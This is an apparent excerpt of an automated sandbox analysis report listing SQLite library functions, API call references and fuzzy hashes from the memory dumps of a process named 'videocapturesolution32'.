                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free
                                                          • String ID:
                                                          • API String ID: 2313487548-0
                                                          • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                          • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                          • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                          • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                          • API String ID: 0-1177837799
                                                          • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                          • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                          • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                          • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_leave$sqlite3_logsqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 4249760608-0
                                                          • Opcode ID: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                          • Instruction ID: 2374180173898b37ca3bb3ba1fa7e33799c7e45bceefb220d1965ad168ba1add
                                                          • Opcode Fuzzy Hash: 7f68af92de5908ba3e8dcee76b4af320268052eb1fd1a8b4810f9ee8d43ae996
                                                          • Instruction Fuzzy Hash: 7F412970A083048BE701DF6AC495B8ABBF6FFA5308F04C46DE8598B355D779D849CB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1648232842-0
                                                          • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                          • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                          • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                          • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                          APIs
                                                          • sqlite3_step.SQLITE3 ref: 609614AB
                                                          • sqlite3_reset.SQLITE3 ref: 609614BF
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                          • String ID:
                                                          • API String ID: 3429445273-0
                                                          • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                          • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                          • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                          • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1035992805-0
                                                          • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                          • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                          • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                          • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                          • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                          • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                          • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                          • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                          • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                          • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 2673540737-0
                                                          • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                          • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                          • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                          • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                          • String ID:
                                                          • API String ID: 3526213481-0
                                                          • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                          • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                          • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                          • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                          APIs
                                                          • sqlite3_prepare.SQLITE3 ref: 60969166
                                                          • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                            • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                          • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                            • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                          • sqlite3_step.SQLITE3 ref: 60969197
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                          • String ID:
                                                          • API String ID: 2877408194-0
                                                          • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                          • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                          • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                          • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID:
                                                          • API String ID: 1163609955-0
                                                          • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                          • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                          • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                          • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                          APIs
                                                          • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                          • sqlite3_step.SQLITE3 ref: 609615C9
                                                          • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                          • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                          • String ID:
                                                          • API String ID: 4265739436-0
                                                          • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                          • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                          • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                          • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                          APIs
                                                          • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                          • strcmp.MSVCRT ref: 6092A66A
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                          • String ID:
                                                          • API String ID: 1894734062-0
                                                          • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                          • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                          • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                          • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 1477753154-0
                                                          • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                          • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                          • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                          • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: into$out of
                                                          • API String ID: 632333372-1114767565
                                                          • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                          • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                          • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                          • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                          APIs
                                                            • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                          • sqlite3_free.SQLITE3 ref: 609193A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_value_text
                                                          • String ID: (NULL)$NULL
                                                          • API String ID: 2175239460-873412390
                                                          • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                          • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                          • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                          • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_log
                                                          • String ID: string or blob too big$|
                                                          • API String ID: 632333372-330586046
                                                          • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                          • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                          • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                          • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
